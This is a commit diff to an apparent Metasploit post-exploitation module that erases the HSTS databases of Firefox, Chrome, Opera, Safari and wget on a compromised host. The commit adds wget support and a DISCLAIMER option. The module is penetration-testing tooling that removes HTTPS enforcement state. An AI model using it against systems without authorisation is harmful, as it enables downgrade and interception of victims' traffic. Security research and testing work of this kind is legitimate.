Disclaimer and wget support added and syntax errors fixed.

UnaPibaGeek · UnaPibaGeek · commit eae9c6043015 · 2018-02-03T02:18:30.000-03:00
diff --git a/modules/post/multi/manage/hsts_eraser.rb b/modules/post/multi/manage/hsts_eraser.rb
@@ -13,26 +13,36 @@ def initialize(info = {})
     super(update_info(info,
       'Name' => 'Web browsers HSTS entries eraser',
       'Description' => %q{
-        This module removes the HSTS database of the following web browsers: Mozilla Firefox,
-        Google Chrome, Opera & Safari.
+        This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
+        Google Chrome, Opera, Safari and wget.
       },
       'License' => MSF_LICENSE,
       'Author' =>
         [
           'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
         ],
       'Platform'     => %w(linux osx unix win),
+      'Arch'         => [ARCH_X86,ARCH_X64],
       'References'   =>
         [
           [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
           [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
-  
         ],
       'SessionTypes' => %w(meterpreter shell)
     ))
+
+    register_options([
+        OptBool.new('DISCLAIMER',
+            [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
+      ])
   end
 
   def run
+    unless (datastore['DISCLAIMER'] == true)
+        print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.")
+        return
+    end
+
     profiles = user_profiles
 
     profiles.each do |user_profile|
@@ -50,7 +60,8 @@ def run
         browsers_hsts_db_path = {
           'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
           'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now
-          'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity"
+          'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
+          'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
         }
       when 'osx'
         browsers_hsts_db_path = {
@@ -116,5 +127,4 @@ def user_profiles
   def system_separator
     return session.platform == 'windows' ? '\\' : '/'
   end
-   
-end
+end
